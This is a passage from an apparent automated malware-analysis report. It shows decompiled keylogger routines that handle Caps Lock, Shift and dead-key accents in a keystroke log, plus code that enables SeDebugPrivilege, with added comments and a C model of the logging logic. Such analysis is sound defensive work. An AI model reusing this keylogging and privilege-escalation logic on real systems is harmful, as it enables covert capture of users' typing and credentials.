                                    															__eax = E24015948(_v284, __ebx,  &_v280, __edi, __esi, __eflags);
                                    															__edx = _v280;
                                    															__eax = __edi;
                                    															__eax = E24013344(__edi, __edx);
                                    														}
                                    													} else {
                                    														_push(0x10);
                                    														L240152F0();
                                    														__eflags = __ax;
                                    														if(__ax >= 0) {
                                    															__edx =  &_v276;
                                    															0 = E24050318(0,  &_v276);
                                    															__eax = _v276;
                                    															__edx =  &_v272;
                                    															__eax = E24015948(_v276, __ebx,  &_v272, __edi, __esi, __eflags);
                                    															__edx = _v272;
                                    															__eax = __edi;
                                    															__eax = E24013344(__edi, __edx);
                                    														} else {
                                    															__edx =  &_v268;
                                    															0 = E24050318(0,  &_v268);
                                    															__eax = _v268;
                                    															__edx =  &_v264;
                                    															__eax = E240159CC(_v268, __ebx,  &_v264, __edi, __esi, __eflags);
                                    															__edx = _v264;
                                    															__eax = __edi;
                                    															__eax = E24013344(__edi, __edx);
                                    														}
                                    													}
                                    												} else {
                                    													__eax =  *__edi;
                                    													__edx = E2401333C( *__edi);
                                    													__eax = __edi;
                                    													__ecx = 1;
                                    													__eax = E240135D0(__edi, 1, __edx);
                                    													// same pattern as the direct GetKeyState(0x14) calls further down:
                                    													// L240152F0 is the GetKeyState import stub, 0x14 = VK_CAPITAL
                                    													_push(0x14);
                                    													L240152F0();
                                    													__eflags = __ax - 1;
                                    													if(__ax != 1) {
                                    														_push(0x10);
                                    														L240152F0();
                                    														__eflags = __ax;
                                    														if(__ax >= 0) {
                                    															__eax = __edi;
                                    															__edx = 0x24052174;
                                    															__eax = E24013344(__edi, 0x24052174);
                                    														} else {
                                    															__eax = __edi;
                                    															__edx = 0x24052180;
                                    															__eax = E24013344(__edi, 0x24052180);
                                    														}
                                    													} else {
                                    														_push(0x10);
                                    														L240152F0();
                                    														__eflags = __ax;
                                    														if(__ax >= 0) {
                                    															__eax = __edi;
                                    															__edx = 0x24052180;
                                    															__eax = E24013344(__edi, 0x24052180);
                                    														} else {
                                    															__eax = __edi;
                                    															__edx = 0x24052174;
                                    															__eax = E24013344(__edi, 0x24052174);
                                    														}
                                    													}
                                    												}
                                    											} else {
                                    												__eax =  *__edi;
                                    												__edx = E2401333C( *__edi);
                                    												__eax = __edi;
                                    												__ecx = 1;
                                    												__eax = E240135D0(__edi, 1, __edx);
                                    												_push(0x14);
                                    												L240152F0();
                                    												__eflags = __ax - 1;
                                    												if(__ax != 1) {
                                    													_push(0x10);
                                    													L240152F0();
                                    													__eflags = __ax;
                                    													if(__ax >= 0) {
                                    														__eax = __edi;
                                    														__edx = 0x2405215c;
                                    														__eax = E24013344(__edi, 0x2405215c);
                                    													} else {
                                    														__eax = __edi;
                                    														__edx = 0x24052168;
                                    														__eax = E24013344(__edi, 0x24052168);
                                    													}
                                    												} else {
                                    													_push(0x10);
                                    													L240152F0();
                                    													__eflags = __ax;
                                    													if(__ax >= 0) {
                                    														__eax = __edi;
                                    														__edx = 0x24052168;
                                    														__eax = E24013344(__edi, 0x24052168);
                                    													} else {
                                    														__eax = __edi;
                                    														__edx = 0x2405215c;
                                    														__eax = E24013344(__edi, 0x2405215c);
                                    													}
                                    												}
                                    											}
                                    										} else {
                                    											__eax =  *__edi;
                                    											__edx = E2401333C( *__edi);
                                    											__eax = __edi;
                                    											__ecx = 1;
                                    											__eax = E240135D0(__edi, 1, __edx);
                                    											_push(0x14);
                                    											L240152F0();
                                    											__eflags = __ax - 1;
                                    											if(__ax != 1) {
                                    												_push(0x10);
                                    												L240152F0();
                                    												__eflags = __ax;
                                    												if(__ax >= 0) {
                                    													__eax = __edi;
                                    													__edx = 0x24052144;
                                    													__eax = E24013344(__edi, 0x24052144);
                                    												} else {
                                    													__eax = __edi;
                                    													__edx = 0x24052150;
                                    													__eax = E24013344(__edi, 0x24052150);
                                    												}
                                    											} else {
                                    												_push(0x10);
                                    												L240152F0();
                                    												__eflags = __ax;
                                    												if(__ax >= 0) {
                                    													__eax = __edi;
                                    													__edx = 0x24052150;
                                    													__eax = E24013344(__edi, 0x24052150);
                                    												} else {
                                    													__eax = __edi;
                                    													__edx = 0x24052144;
                                    													__eax = E24013344(__edi, 0x24052144);
                                    												}
                                    											}
                                    										}
                                    									}
                                    									goto L285;
                                    							}
                                    						} else {
                                    							// 0x14 = VK_CAPITAL: GetKeyState returns 1 in the low bit when Caps Lock is toggled on
                                    							_t342 = GetKeyState(0x14);
                                    							__eflags = _t342 - 1;
                                    							if(_t342 != 1) {
                                    								// 0x10 = VK_SHIFT: a held key sets bit 15, so the SHORT result is negative
                                    								_t343 = GetKeyState(0x10);
                                    								__eflags = _t343;
                                    								if(_t343 >= 0) {
                                    									_t345 = E2401333C( *0x240632f8);
                                    									__eflags = _t345;
                                    									if(_t345 > 0) {
                                    										_t347 = E2401333C( *0x240632f8);
                                    										_t444 =  *0x240632f8;
                                    										__eflags =  *((char*)(_t444 + _t347 - 1)) - 0xb4;
                                    										// 0xb4 = acute accent (dead key); append the constant at 0x24051de4 to the
                                    										// global key log at 0x240632f8 only if the log does not already end with it
                                    										if( *((char*)(_t444 + _t347 - 1)) != 0xb4) {
                                    											E24013344(0x240632f8, 0x24051de4);
                                    										}
                                    									}
                                    								} else {
                                    									_t351 = E2401333C( *0x240632f8);
                                    									__eflags = _t351;
                                    									if(_t351 > 0) {
                                    										_t353 = E2401333C( *0x240632f8);
                                    										_t446 =  *0x240632f8;
                                    										__eflags =  *((char*)(_t446 + _t353 - 1)) - 0x60;
                                    										// 0x60 = grave accent (dead key), same de-duplicated append as above
                                    										if( *((char*)(_t446 + _t353 - 1)) != 0x60) {
                                    											E24013344(0x240632f8, 0x24051df0);
                                    										}
                                    									}
                                    								}
                                    							} else {
                                    								_t356 = GetKeyState(0x10);
                                    								__eflags = _t356;
                                    								if(_t356 >= 0) {
                                    									_t358 = E2401333C( *0x240632f8);
                                    									__eflags = _t358;
                                    									if(_t358 > 0) {
                                    										_t360 = E2401333C( *0x240632f8);
                                    										_t448 =  *0x240632f8;
                                    										__eflags =  *((char*)(_t448 + _t360 - 1)) - 0x60;
                                    										if( *((char*)(_t448 + _t360 - 1)) != 0x60) {
                                    											E24013344(0x240632f8, 0x24051df0);
                                    										}
                                    									}
                                    								} else {
                                    									_t364 = E2401333C( *0x240632f8);
                                    									__eflags = _t364;
                                    									if(_t364 > 0) {
                                    										_t366 = E2401333C( *0x240632f8);
                                    										_t450 =  *0x240632f8;
                                    										__eflags =  *((char*)(_t450 + _t366 - 1)) - 0xb4;
                                    										if( *((char*)(_t450 + _t366 - 1)) != 0xb4) {
                                    											E24013344(0x240632f8, 0x24051de4);
                                    										}
                                    									}
                                    								}
                                    							}
                                    							goto L285;
                                    						}
                                    					} else {
                                    						if(GetKeyState(0x14) != 1) {
                                    							_t370 = GetKeyState(0x10);
                                    							__eflags = _t370;
                                    							if(_t370 >= 0) {
                                    								_t372 = E2401333C( *0x240632f8);
                                    								__eflags = _t372;
                                    								if(_t372 > 0) {
                                    									_t374 = E2401333C( *0x240632f8);
                                    									_t452 =  *0x240632f8;
                                    									__eflags =  *((char*)(_t452 + _t374 - 1)) - 0x7e;
                                    									// 0x7e = tilde (dead key); append the constant at 0x24051dc0 unless the
                                    									// key log already ends with it
                                    									if( *((char*)(_t452 + _t374 - 1)) != 0x7e) {
                                    										E24013344(0x240632f8, 0x24051dc0);
                                    									}
                                    								}
                                    							} else {
                                    								_t378 = E2401333C( *0x240632f8);
                                    								__eflags = _t378;
                                    								if(_t378 > 0) {
                                    									_t380 = E2401333C( *0x240632f8);
                                    									_t454 =  *0x240632f8;
                                    									__eflags =  *((char*)(_t454 + _t380 - 1)) - 0x5e;
                                    									// 0x5e = circumflex (dead key), same de-duplicated append
                                    									if( *((char*)(_t454 + _t380 - 1)) != 0x5e) {
                                    										E24013344(0x240632f8, 0x24051dcc);
                                    									}
                                    								}
                                    							}
                                    						} else {
                                    							if(GetKeyState(0x10) >= 0) {
                                    								_t385 = E2401333C( *0x240632f8);
                                    								__eflags = _t385;
                                    								if(_t385 > 0) {
                                    									_t387 = E2401333C( *0x240632f8);
                                    									_t456 =  *0x240632f8;
                                    									__eflags =  *((char*)(_t456 + _t387 - 1)) - 0x5e;
                                    									if( *((char*)(_t456 + _t387 - 1)) != 0x5e) {
                                    										E24013344(0x240632f8, 0x24051dcc);
                                    									}
                                    								}
                                    							} else {
                                    								if(E2401333C( *0x240632f8) > 0 &&  *((char*)( *0x240632f8 + E2401333C( *0x240632f8) - 1)) != 0x7e) {
                                    									E24013344(0x240632f8, 0x24051dc0);
                                    								}
                                    							}
                                    						}
                                    					}
                                    					L285:
                                    					_t397 = _t397 + 1;
                                    					_t463 = _t463 + 4;
                                    					if(_t397 == 0) {
                                    						_t247 = E2401333C( *0x240632f8);
                                    						E24013590( *0x240632f8, 2, _t247 != 1,  &_v360);
                                    						E24013480(_v360, 0x24051dd8);
                                    						if(_t247 != 1) {
                                    							__eflags = E2401333C( *0x240632f8) - 1;
                                    							E24013590( *0x240632f8, 2, E2401333C( *0x240632f8) - 1,  &_v364);
                                    							E24013480(_v364, 0x2405218c);
                                    							if(__eflags != 0) {
                                    								__eflags = E2401333C( *0x240632f8) - 1;
                                    								E24013590( *0x240632f8, 2, E2401333C( *0x240632f8) - 1,  &_v368);
                                    								E24013480(_v368, 0x24051db4);
                                    								if(__eflags != 0) {
                                    									__eflags = E2401333C( *0x240632f8) - 1;
                                    									E24013590( *0x240632f8, 2, E2401333C( *0x240632f8) - 1,  &_v372);
                                    									E24013480(_v372, 0x24052198);
                                    									if(__eflags == 0) {
                                    										E240135D0(0x240632f8, 1, E2401333C( *0x240632f8));
                                    									}
                                    								} else {
                                    									E240135D0(0x240632f8, 1, E2401333C( *0x240632f8));
                                    								}
                                    							} else {
                                    								E240135D0(0x240632f8, 1, E2401333C( *0x240632f8));
                                    							}
                                    						} else {
                                    							E240135D0(0x240632f8, 1, E2401333C( *0x240632f8));
                                    						}
                                    						// the log grew past the length saved at loop entry (*0x24063300):
                                    						// flag at 0x24063308 marks that new keystrokes are pending
                                    						if(E2401333C( *0x240632f8) >  *0x24063300) {
                                    							 *0x24063308 = 1;
                                    						}
                                    						// restore the exception frame registered in L1 and run the cleanup routine
                                    						_pop(_t427);
                                    						 *[fs:eax] = _t427;
                                    						_push(E24051DA2);
                                    						return E240130AC( &_v372, 0x5c);
                                    					}
                                    				}
                                    				L1:
                                    				_push(0);
                                    				_push(0);
                                    				_t398 = _t398 - 1;
                                    				if(_t398 != 0) {
                                    					goto L1;
                                    				} else {
                                    					// register an SEH frame via fs:[0] (Delphi try/finally pattern)
                                    					_push(_t465);
                                    					_push(0x24051d9b);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t466;
                                    					// remember the key-log length before scanning; compared after the loop
                                    					 *0x24063300 = E2401333C( *0x240632f8);
                                    					_t397 = 8;
                                    					_t463 = 0x24063310;
                                    					goto L3;
                                    				}
                                    			}
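The four Caps Lock / Shift branches above are the keylogger's case and dead-key handling: `GetKeyState(0x14)` (VK_CAPITAL) returning 1 means Caps Lock is toggled, `GetKeyState(0x10)` (VK_SHIFT) returning a negative SHORT means Shift is held, and the accent bytes 0xb4, 0x60, 0x7e and 0x5e are appended to the global log at 0x240632f8 only when it does not already end with them. The following stand-alone C model is an added example, not code from the sample or from the Joe Sandbox report. It assumes only the documented bit-15 (held) and bit-0 (toggled) semantics of `GetKeyState`, which it emulates so the code runs off Windows; the names `KeyState`, `emu_GetKeyState`, `log_uppercase`, `dead_key_accent`, `log_dead_key` and `g_keylog` are this example's own, and the string constants the sample appends are assumed to be the single accent bytes its comparisons test for.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define VK_SHIFT   0x10
#define VK_CAPITAL 0x14

/* Emulated GetKeyState(): bit 15 set = key currently down, bit 0 set = toggled
   (Caps Lock). Returned as SHORT, so a held key reads as a negative number,
   which is why the pseudocode tests `__ax >= 0` instead of masking a bit. */
typedef struct { bool caps_toggled; bool shift_down; } KeyState;

static short emu_GetKeyState(const KeyState *ks, int vk)
{
    switch (vk) {
    case VK_CAPITAL: return ks->caps_toggled ? 1 : 0;
    case VK_SHIFT:   return ks->shift_down ? (short)0x8000 : 0;
    default:         return 0;
    }
}

/* The two tests from the pseudocode: `__ax - 1` for Caps Lock and `__ax >= 0`
   for Shift. A letter is logged upper-case when exactly one of them is active. */
bool log_uppercase(const KeyState *ks)
{
    bool caps  = emu_GetKeyState(ks, VK_CAPITAL) == 1;
    bool shift = emu_GetKeyState(ks, VK_SHIFT) < 0;   /* 0x8000 as SHORT is negative */
    return caps != shift;
}

/* Which accent byte the sample stores for the two dead keys, read off the four
   Caps/Shift branches: acute/grave key -> 0xb4 or 0x60, tilde/circumflex key
   -> 0x7e or 0x5e. The sample applies the same Caps/Shift interplay as for
   letters. */
unsigned char dead_key_accent(const KeyState *ks, bool acute_grave_key)
{
    bool upper = log_uppercase(ks);
    if (acute_grave_key) return upper ? 0x60 : 0xb4;  /* grave (`) or acute (´) */
    return upper ? 0x5e : 0x7e;                       /* circumflex (^) or tilde (~) */
}

/* Global log string standing in for the sample's buffer at 0x240632f8. */
static char g_keylog[256];

void reset_keylog(void) { g_keylog[0] = '\0'; }

/* Dead-key branch: append the accent unless the log already ends with it, so a
   held or repeated dead key does not duplicate the accent. Returns the log
   length afterwards. */
size_t log_dead_key(const KeyState *ks, bool acute_grave_key)
{
    unsigned char accent = dead_key_accent(ks, acute_grave_key);
    size_t n = strlen(g_keylog);
    if (n > 0 && (unsigned char)g_keylog[n - 1] == accent)
        return n;                                     /* already there: skip */
    if (n + 1 < sizeof g_keylog) {
        g_keylog[n] = (char)accent;
        g_keylog[n + 1] = '\0';
        n++;
    }
    return n;
}

int main(void)
{
    /* constructed states: every Caps/Shift combination */
    static const KeyState states[4] = {
        {false, false}, {false, true}, {true, false}, {true, true}
    };
    for (int i = 0; i < 4; i++) {
        const KeyState *ks = &states[i];
        printf("caps=%d shift=%d -> upper=%d acute/grave=0x%02x tilde/circ=0x%02x\n",
               ks->caps_toggled, ks->shift_down, log_uppercase(ks),
               dead_key_accent(ks, true), dead_key_accent(ks, false));
    }
    reset_keylog();
    log_dead_key(&states[0], true);
    log_dead_key(&states[0], true);   /* duplicate suppressed */
    printf("log length after two acute presses: %zu\n", strlen(g_keylog));
    return 0;
}
```

The de-duplication check is what distinguishes a dead key from a normal character in this logger: the accent is recorded once and the next letter is appended after it, so the log reads as typed.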
                                    0x24050b19
                                    0x24050b1b
                                    0x24050b20
                                    0x24050b20
                                    0x24050b17
                                    0x24050b0b
                                    0x24050a5d
                                    0x24050a5d
                                    0x24050a64
                                    0x24050a66
                                    0x24050a68
                                    0x24050a6d
                                    0x24050a72
                                    0x24050a74
                                    0x24050a79
                                    0x24050a7d
                                    0x24050aad
                                    0x24050aaf
                                    0x24050ab4
                                    0x24050ab7
                                    0x24050aca
                                    0x24050acc
                                    0x24050ad1
                                    0x24050ab9
                                    0x24050ab9
                                    0x24050abb
                                    0x24050ac0
                                    0x24050ac0
                                    0x24050a7f
                                    0x24050a7f
                                    0x24050a81
                                    0x24050a86
                                    0x24050a89
                                    0x24050a9c
                                    0x24050a9e
                                    0x24050aa3
                                    0x24050a8b
                                    0x24050a8b
                                    0x24050a8d
                                    0x24050a92
                                    0x24050a92
                                    0x24050a89
                                    0x24050a7d
                                    0x240509cf
                                    0x240509cf
                                    0x240509d6
                                    0x240509d8
                                    0x240509da
                                    0x240509df
                                    0x240509e4
                                    0x240509e6
                                    0x240509eb
                                    0x240509ef
                                    0x24050a1f
                                    0x24050a21
                                    0x24050a26
                                    0x24050a29
                                    0x24050a3c
                                    0x24050a3e
                                    0x24050a43
                                    0x24050a2b
                                    0x24050a2b
                                    0x24050a2d
                                    0x24050a32
                                    0x24050a32
                                    0x240509f1
                                    0x240509f1
                                    0x240509f3
                                    0x240509f8
                                    0x240509fb
                                    0x24050a0e
                                    0x24050a10
                                    0x24050a15
                                    0x240509fd
                                    0x240509fd
                                    0x240509ff
                                    0x24050a04
                                    0x24050a04
                                    0x240509fb
                                    0x240509ef
                                    0x24050941
                                    0x24050941
                                    0x24050948
                                    0x2405094a
                                    0x2405094c
                                    0x24050951
                                    0x24050956
                                    0x24050958
                                    0x2405095d
                                    0x24050961
                                    0x24050991
                                    0x24050993
                                    0x24050998
                                    0x2405099b
                                    0x240509ae
                                    0x240509b0
                                    0x240509b5
                                    0x2405099d
                                    0x2405099d
                                    0x2405099f
                                    0x240509a4
                                    0x240509a4
                                    0x24050963
                                    0x24050963
                                    0x24050965
                                    0x2405096a
                                    0x2405096d
                                    0x24050980
                                    0x24050982
                                    0x24050987
                                    0x2405096f
                                    0x2405096f
                                    0x24050971
                                    0x24050976
                                    0x24050976
                                    0x2405096d
                                    0x24050961
                                    0x2405093f
                                    0x00000000
                                    0x00000000
                                    0x24050ce3
                                    0x24050ce5
                                    0x24050cea
                                    0x24050cec
                                    0x24050f59
                                    0x24050f5b
                                    0x24050f60
                                    0x24050f64
                                    0x24050fbe
                                    0x24050fc0
                                    0x24050fc5
                                    0x24050fc8
                                    0x24050ff0
                                    0x24050ff7
                                    0x24050ffc
                                    0x24050fff
                                    0x24051002
                                    0x24051007
                                    0x2405100a
                                    0x2405100c
                                    0x24050fca
                                    0x24050fca
                                    0x24050fd1
                                    0x24050fd6
                                    0x24050fd9
                                    0x24050fdc
                                    0x24050fe1
                                    0x24050fe4
                                    0x24050fe6
                                    0x24050fe6
                                    0x24050f66
                                    0x24050f66
                                    0x24050f68
                                    0x24050f6d
                                    0x24050f70
                                    0x24050f98
                                    0x24050f9f
                                    0x24050fa4
                                    0x24050fa7
                                    0x24050faa
                                    0x24050faf
                                    0x24050fb2
                                    0x24050fb4
                                    0x24050f72
                                    0x24050f72
                                    0x24050f79
                                    0x24050f7e
                                    0x24050f81
                                    0x24050f84
                                    0x24050f89
                                    0x24050f8c
                                    0x24050f8e
                                    0x24050f8e
                                    0x24050f70
                                    0x24050cf2
                                    0x24050cf2
                                    0x24050cf4
                                    0x24050cf9
                                    0x24050cfb
                                    0x24050d00
                                    0x24050d80
                                    0x24050d82
                                    0x24050d87
                                    0x24050d89
                                    0x24050d8e
                                    0x24050e0e
                                    0x24050e10
                                    0x24050e15
                                    0x24050e17
                                    0x24050e1c
                                    0x24050e9c
                                    0x24050e9e
                                    0x24050ea3
                                    0x24050ea7
                                    0x24050f01
                                    0x24050f03
                                    0x24050f08
                                    0x24050f0b
                                    0x24050f33
                                    0x24050f3a
                                    0x24050f3f
                                    0x24050f42
                                    0x24050f45
                                    0x24050f4a
                                    0x24050f4d
                                    0x24050f4f
                                    0x24050f0d
                                    0x24050f0d
                                    0x24050f14
                                    0x24050f19
                                    0x24050f1c
                                    0x24050f1f
                                    0x24050f24
                                    0x24050f27
                                    0x24050f29
                                    0x24050f29
                                    0x24050ea9
                                    0x24050ea9
                                    0x24050eab
                                    0x24050eb0
                                    0x24050eb3
                                    0x24050edb
                                    0x24050ee2
                                    0x24050ee7
                                    0x24050eea
                                    0x24050eed
                                    0x24050ef2
                                    0x24050ef5
                                    0x24050ef7
                                    0x24050eb5
                                    0x24050eb5
                                    0x24050ebc
                                    0x24050ec1
                                    0x24050ec4
                                    0x24050ec7
                                    0x24050ecc
                                    0x24050ecf
                                    0x24050ed1
                                    0x24050ed1
                                    0x24050eb3
                                    0x24050e1e
                                    0x24050e1e
                                    0x24050e25
                                    0x24050e27
                                    0x24050e29
                                    0x24050e2e
                                    0x24050e33
                                    0x24050e35
                                    0x24050e3a
                                    0x24050e3e
                                    0x24050e6e
                                    0x24050e70
                                    0x24050e75
                                    0x24050e78
                                    0x24050e8b
                                    0x24050e8d
                                    0x24050e92
                                    0x24050e7a
                                    0x24050e7a
                                    0x24050e7c
                                    0x24050e81
                                    0x24050e81
                                    0x24050e40
                                    0x24050e40
                                    0x24050e42
                                    0x24050e47
                                    0x24050e4a
                                    0x24050e5d
                                    0x24050e5f
                                    0x24050e64
                                    0x24050e4c
                                    0x24050e4c
                                    0x24050e4e
                                    0x24050e53
                                    0x24050e53
                                    0x24050e4a
                                    0x24050e3e
                                    0x24050d90
                                    0x24050d90
                                    0x24050d97
                                    0x24050d99
                                    0x24050d9b
                                    0x24050da0
                                    0x24050da5
                                    0x24050da7
                                    0x24050dac
                                    0x24050db0
                                    0x24050de0
                                    0x24050de2
                                    0x24050de7
                                    0x24050dea
                                    0x24050dfd
                                    0x24050dff
                                    0x24050e04
                                    0x24050dec
                                    0x24050dec
                                    0x24050dee
                                    0x24050df3
                                    0x24050df3
                                    0x24050db2
                                    0x24050db2
                                    0x24050db4
                                    0x24050db9
                                    0x24050dbc
                                    0x24050dcf
                                    0x24050dd1
                                    0x24050dd6
                                    0x24050dbe
                                    0x24050dbe
                                    0x24050dc0
                                    0x24050dc5
                                    0x24050dc5
                                    0x24050dbc
                                    0x24050db0
                                    0x24050d02
                                    0x24050d02
                                    0x24050d09
                                    0x24050d0b
                                    0x24050d0d
                                    0x24050d12
                                    0x24050d17
                                    0x24050d19
                                    0x24050d1e
                                    0x24050d22
                                    0x24050d52
                                    0x24050d54
                                    0x24050d59
                                    0x24050d5c
                                    0x24050d6f
                                    0x24050d71
                                    0x24050d76
                                    0x24050d5e
                                    0x24050d5e
                                    0x24050d60
                                    0x24050d65
                                    0x24050d65
                                    0x24050d24
                                    0x24050d24
                                    0x24050d26
                                    0x24050d2b
                                    0x24050d2e
                                    0x24050d41
                                    0x24050d43
                                    0x24050d48
                                    0x24050d30
                                    0x24050d30
                                    0x24050d32
                                    0x24050d37
                                    0x24050d37
                                    0x24050d2e
                                    0x24050d22
                                    0x24050d00
                                    0x00000000
                                    0x00000000
                                    0x24051016
                                    0x24051018
                                    0x2405101d
                                    0x2405101f
                                    0x240512bc
                                    0x240512be
                                    0x240512c3
                                    0x240512c7
                                    0x24051339
                                    0x2405133b
                                    0x24051340
                                    0x24051343
                                    0x24051377
                                    0x24051381
                                    0x24051386
                                    0x2405138c
                                    0x24051392
                                    0x24051397
                                    0x2405139d
                                    0x2405139f
                                    0x24051345
                                    0x24051345
                                    0x2405134f
                                    0x24051354
                                    0x2405135a
                                    0x24051360
                                    0x24051365
                                    0x2405136b
                                    0x2405136d
                                    0x2405136d
                                    0x240512c9
                                    0x240512c9
                                    0x240512cb
                                    0x240512d0
                                    0x240512d3
                                    0x24051307
                                    0x24051311
                                    0x24051316
                                    0x2405131c
                                    0x24051322
                                    0x24051327
                                    0x2405132d
                                    0x2405132f
                                    0x240512d5
                                    0x240512d5
                                    0x240512df
                                    0x240512e4
                                    0x240512ea
                                    0x240512f0
                                    0x240512f5
                                    0x240512fb
                                    0x240512fd
                                    0x240512fd
                                    0x240512d3
                                    0x24051025
                                    0x24051025
                                    0x24051027
                                    0x2405102c
                                    0x2405102e
                                    0x24051033
                                    0x240510b3
                                    0x240510b5
                                    0x240510ba
                                    0x240510bc
                                    0x240510c1
                                    0x24051141
                                    0x24051143
                                    0x24051148
                                    0x2405114a
                                    0x2405114f
                                    0x240511cf
                                    0x240511d1
                                    0x240511d6
                                    0x240511da
                                    0x2405124c
                                    0x2405124e
                                    0x24051253
                                    0x24051256
                                    0x2405128a
                                    0x24051294
                                    0x24051299
                                    0x2405129f
                                    0x240512a5
                                    0x240512aa
                                    0x240512b0
                                    0x240512b2
                                    0x24051258
                                    0x24051258
                                    0x24051262
                                    0x24051267
                                    0x2405126d
                                    0x24051273
                                    0x24051278
                                    0x2405127e
                                    0x24051280
                                    0x24051280
                                    0x240511dc
                                    0x240511dc
                                    0x240511de
                                    0x240511e3
                                    0x240511e6
                                    0x2405121a
                                    0x24051224
                                    0x24051229
                                    0x2405122f
                                    0x24051235
                                    0x2405123a
                                    0x24051240
                                    0x24051242
                                    0x240511e8
                                    0x240511e8
                                    0x240511f2
                                    0x240511f7
                                    0x240511fd
                                    0x24051203
                                    0x24051208
                                    0x2405120e
                                    0x24051210
                                    0x24051210
                                    0x240511e6
                                    0x24051151
                                    0x24051151
                                    0x24051158
                                    0x2405115a
                                    0x2405115c
                                    0x24051161
                                    0x24051166
                                    0x24051168
                                    0x2405116d
                                    0x24051171
                                    0x240511a1
                                    0x240511a3
                                    0x240511a8
                                    0x240511ab
                                    0x240511be
                                    0x240511c0
                                    0x240511c5
                                    0x240511ad
                                    0x240511ad
                                    0x240511af
                                    0x240511b4
                                    0x240511b4
                                    0x24051173
                                    0x24051173
                                    0x24051175
                                    0x2405117a
                                    0x2405117d
                                    0x24051190
                                    0x24051192
                                    0x24051197
                                    0x2405117f
                                    0x2405117f
                                    0x24051181
                                    0x24051186
                                    0x24051186
                                    0x2405117d
                                    0x24051171
                                    0x240510c3
                                    0x240510c3
                                    0x240510ca
                                    0x240510cc
                                    0x240510ce
                                    0x240510d3
                                    0x240510d8
                                    0x240510da
                                    0x240510df
                                    0x240510e3
                                    0x24051113
                                    0x24051115
                                    0x2405111a
                                    0x2405111d
                                    0x24051130
                                    0x24051132
                                    0x24051137
                                    0x2405111f
                                    0x2405111f
                                    0x24051121
                                    0x24051126
                                    0x24051126
                                    0x240510e5
                                    0x240510e5
                                    0x240510e7
                                    0x240510ec
                                    0x240510ef
                                    0x24051102
                                    0x24051104
                                    0x24051109
                                    0x240510f1
                                    0x240510f1
                                    0x240510f3
                                    0x240510f8
                                    0x240510f8
                                    0x240510ef
                                    0x240510e3
                                    0x24051035
                                    0x24051035
                                    0x2405103c
                                    0x2405103e
                                    0x24051040
                                    0x24051045
                                    0x2405104a
                                    0x2405104c
                                    0x24051051
                                    0x24051055
                                    0x24051085
                                    0x24051087
                                    0x2405108c
                                    0x2405108f
                                    0x240510a2
                                    0x240510a4
                                    0x240510a9
                                    0x24051091
                                    0x24051091
                                    0x24051093
                                    0x24051098
                                    0x24051098
                                    0x24051057
                                    0x24051057
                                    0x24051059
                                    0x2405105e
                                    0x24051061
                                    0x24051074
                                    0x24051076
                                    0x2405107b
                                    0x24051063
                                    0x24051063
                                    0x24051065
                                    0x2405106a
                                    0x2405106a
                                    0x24051061
                                    0x24051055
                                    0x24051033
                                    0x00000000
                                    0x00000000
                                    0x240513a9
                                    0x240513ab
                                    0x240513b0
                                    0x240513b2
                                    0x240516dd
                                    0x240516df
                                    0x240516e4

                                    APIs
                                    • GetAsyncKeyState.USER32(00000008), ref: 240503C9
                                    • GetKeyState.USER32(00000014), ref: 240503EC
                                    • GetKeyState.USER32(00000010), ref: 240503F9
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: State$Async
                                    • String ID:
                                    • API String ID: 993286747-0
                                    • Opcode ID: a838a1ded916f1e9fa18c54a896cb45272f7852ae25434eae39dbc2e0e99ddbd
                                    • Instruction ID: 2c685fa8047264c46bc5bbd45440302d312ea74eec7b0dd389396ce74b99bb26
                                    • Opcode Fuzzy Hash: a838a1ded916f1e9fa18c54a896cb45272f7852ae25434eae39dbc2e0e99ddbd
                                    • Instruction Fuzzy Hash: C8B15234B042458BFB12E769C844B9DB7E2FF59308F5088A0D4489F26DDEB6DDC24B56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			E2403C424() {
                                    				void* _v8;
                                    				long _v12;
                                    				intOrPtr _v16;
                                    				struct _TOKEN_PRIVILEGES _v28;
                                    				struct _OSVERSIONINFOA _v176;
                                    				int _t20;
                                    				intOrPtr _t42;
                                    				intOrPtr _t44;
                                    
                                    				_v176.dwOSVersionInfoSize = 0x94; // sizeof(OSVERSIONINFOA)
                                    				_t20 = GetVersionExA( &_v176);
                                    				if(_v176.dwPlatformId != 1) { // 1 = VER_PLATFORM_WIN32_WINDOWS (Win9x has no tokens); only runs on the NT line
                                    					_push(0x2403c4e9); // Delphi try/finally frame: SEH record linked at fs:[0]
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t44;
                                    					OpenProcessToken(GetCurrentProcess(), 0x20,  &_v8); // 0x20 = TOKEN_ADJUST_PRIVILEGES
                                    					LookupPrivilegeValueA(0, "SeDebugPrivilege",  &(_v28.Privileges)); // fills Privileges[0].Luid
                                    					_v28.PrivilegeCount = 1;
                                    					_v16 = 2; // Privileges[0].Attributes = SE_PRIVILEGE_ENABLED (_v16 is the Attributes slot of _v28)
                                    					_v12 = 0;
                                    					AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0,  &_v12); // result and GetLastError never checked: silently does nothing if the token lacks the privilege (non-admin)
                                    					_v28.PrivilegeCount = 1; // same call repeated with identical arguments; redundant but present in the binary
                                    					_v16 = 2;
                                    					_v12 = 0;
                                    					AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0,  &_v12);
                                    					CloseHandle(_v8);
                                    					_pop(_t42); // unlink the try/finally frame
                                    					 *[fs:eax] = _t42;
                                    					return 0;
                                    				}
                                    				return _t20;
                                    			}

                                    APIs
                                    • GetVersionExA.KERNEL32(?), ref: 2403C441
                                    • GetCurrentProcess.KERNEL32(00000020,?,00000000,2403C4E9,?,?), ref: 2403C467
                                    • OpenProcessToken.ADVAPI32(00000000,00000020,?,00000000,2403C4E9,?,?), ref: 2403C46D
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 2403C480
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,?,00000000,SeDebugPrivilege,?,00000000,00000020,?,00000000,2403C4E9,?,?), ref: 2403C4AA
